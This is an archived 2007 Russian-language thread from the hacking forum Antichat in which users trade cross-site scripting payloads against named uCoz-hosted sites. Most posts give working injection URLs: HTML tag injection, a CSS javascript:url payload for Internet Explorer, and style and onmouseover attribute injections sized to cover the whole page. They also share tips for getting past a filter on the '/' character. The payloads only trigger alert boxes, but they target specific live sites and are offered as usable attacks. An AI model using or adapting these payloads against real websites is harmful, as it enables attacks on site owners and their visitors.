Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   XSS в ucoz? (https://forum.antichat.xyz/showthread.php?t=51920)

Ponchik 24.10.2007 20:21

XSS в ucoz?
 
re2all :)

Ну... В общем такая штука есть везде как я посомтрел и понял :)
Вот случайно выбрал пару сайтов
_http://cs.ucoz.ru/forum/5"><h1>Hello
_http://levitski.clan.su/index/34-13"><h1>Hello
_http://muonline.ucoz.ru/forum/2-2-1"><h1>Hello
_http://ucoz.ucoz.ru/news/2006-11-08-17"><h1>Hello
Вот, работает, но если прописать <script> ... </script> ему не понравится символ /
Возможно-ли это обойти?
Offtop: Прошу не бить если не туда выложил, более подходяшего места не нащёл :)

$aSH 24.10.2007 22:30

Код:

_http://cs.ucoz.ru/forum/5%22style="background:url(javascript:alert('ok'))
работает только в IE

$aSH 24.10.2007 22:31

http://old.antichat.ru/crackchat/HTML/
тебе в помощь

inv 24.10.2007 23:02

Цитата:

http://cs.ucoz.ru/forum/5%22style=%22visibility:none;width:100%25;height:1 00%25;%22onmouseover=%22alert(0)
проверял в опере..думаю работает везде

%25 надо заменить на что-нибдуь другое

Цитата:

http://cs.ucoz.ru/forum/5%22style=%22display:block;position:absolute;visib ility:none;width:300;height:300;%22onmouseover=%22 alert(0)

$aSH 25.10.2007 00:35

onmouseover мне не нравится =\

inv 25.10.2007 00:37

чем

Cawabunga 25.10.2007 01:18

Цитата:

чем
Не напрягайся он тупо посты набивает! (:

$aSH 25.10.2007 01:49

calintz
ты еще скажи что я дату регистрации подкрутил.
хочется показаться умным... постарайся себя пересилить

inv
первый способ только при наведении на ссылку. собственно этим и не нравится, блок не обрабатывается
второй способ - опера игнорит

inv 25.10.2007 02:00

visibility:none;width:300;height:300; тебе это не о чем не говорит?ссылку можно растянуть на весь броузер

единственное токо я перепутал onmouseover c onmousemove

Поэтому я честно говоря не вижу что тут может не нравится?=)
п с я все тестил в опере (смотреть надо только второй вариант)
насчет не обрабаывается - незабываем удалять пробелы получаемые после вставки кода на форуме

$aSH 25.10.2007 16:05

во, точно. а я смотрю чтото не то...

зы. не поверишь, говорит

inlanger 25.10.2007 17:02

чё-то не сильно работает...

inv 25.10.2007 19:13

все работает,пробелы уберите.

heks 26.10.2007 18:50

как то раньше исследовал его на xss нашел на форуме пару.


Время: 00:45